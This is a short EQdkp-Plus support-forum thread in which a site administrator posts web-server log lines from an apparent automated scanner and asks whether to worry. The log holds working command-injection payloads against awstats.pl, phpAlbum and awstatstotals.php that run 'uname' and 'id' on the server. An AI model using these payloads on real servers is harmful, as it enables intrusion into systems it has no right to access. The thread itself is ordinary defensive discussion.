phpBB Forum

It is currently Wed 23. May 2012, 18:14

All times are UTC + 1 hour

Forum rules


Hello dearest user and welcome to our EQDKP-Plus support forum.

Please read the following rules and terms before posting anything! Failure in doing so will result in being ignored or being banned. Posting in our boards means you have read, understood and accepted those rules.

English Board Rules – Click here



Post new topic Reply to topic  [ 3 posts ] 
Author Message
Offline
 Post subject: Possible hacking attempt?
PostPosted: Sun 4. Dec 2011, 21:14 

Joined: Sun 4. Dec 2011, 21:02
Posts: 2
Hi! Thanks for the great updated EQdkp system! Anyway, I adding our raid and items today and noticed one client being in weird address when browsing Admin Index, shown in image below. I googled the IP and it seems to be from Taiwan. No one in our guild is from there, or even close :p I also tried that myself and I could browse the site in /stats/ folder, even tho it does not exist in my server. Not really sure what's going on.. Also, what the heck is awstats.pl?

Image

If the image does not show up, someone from 203.72.59.6 was browsing "/stats/awstats.pl?configdir=|echo;echo YYYAAZ;uname;id;echo YYY;echo|" in my EQdkp-Plus site. I guess he's trying to print usernames/ids? Any ideas if I should be worried?

edit: checked apache access.log, adding it below

Code:
203.72.59.6 - - [04/Dec/2011:20:42:01 +0200] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:02 +0200] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;;echo%20YYY;echo| HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:02 +0200] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 302 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:02 +0200] "GET /cgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:03 +0200] "GET /cgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:03 +0200] "GET /scgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:03 +0200] "GET /scgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 303 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:04 +0200] "GET /scgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 301 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:04 +0200] "GET /scgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 299 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:04 +0200] "GET /scripts/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:05 +0200] "GET /stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| HTTP/1.1" 200 69423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:07 +0200] "GET /apps/phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:08 +0200] "GET /phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:08 +0200] "GET /main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:08 +0200] "GET /phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:09 +0200] "GET /apps/phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:09 +0200] "GET /awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:09 +0200] "GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1" 404 301 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:10 +0200] "GET /stat/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
203.72.59.6 - - [04/Dec/2011:20:42:10 +0200] "GET /awstatstotals/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d HTTP/1.1" 404 307 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"


Thanks,
moz



Top
 Profile  
 
Online
 Post subject: Re: Possible hacking attempt?
PostPosted: Sun 4. Dec 2011, 22:33 
Core-Developer
User avatar

Joined: Wed 10. Dec 2008, 13:06
Posts: 9025
Location: Heilbronn, Germany
stats/awstats is not part of eqdkp-plus... do you have such a folder?
its possible that somebody tries to search for security holes in eqdkp+, but the latest version should contain no known security flaw. if you're up2date, you shpuld be safe...


Support my work:
Image Image
Donate your played PS3 games:
Alternative: Donate your played Playstation3 games (PAL, Region Code 2).



Top
 Profile  
 
Offline
 Post subject: Re: Possible hacking attempt?
PostPosted: Sun 4. Dec 2011, 23:39 

Joined: Sun 4. Dec 2011, 21:02
Posts: 2
Thanks for the quick reply. No, I do not have /stats/ folder in my web directory, but when I type http://myeqdkpsite.com/stats/ to my browser it opens stats.php page without stylesheets (obviously, this screws the css-paths). Maybe it has something to do with my Apache settings, I don't know?

Looking at the log file it seems he's just testing various webapps I don't even have, some random bot just crawling every site in its path perhaps, which is weird on its own since I'm not even using DNS? Looks like it's not eqDKP related, just happened to notice it few days after installing eqDKP. Thanks for clarifying that.



Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 3 posts ] 

All times are UTC + 1 hour


Who is online

Users browsing this forum: No registered users and 2 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  

(C) The EQdkp-Plus Developer Team
EQdkp Plus Template by Ramon Kaes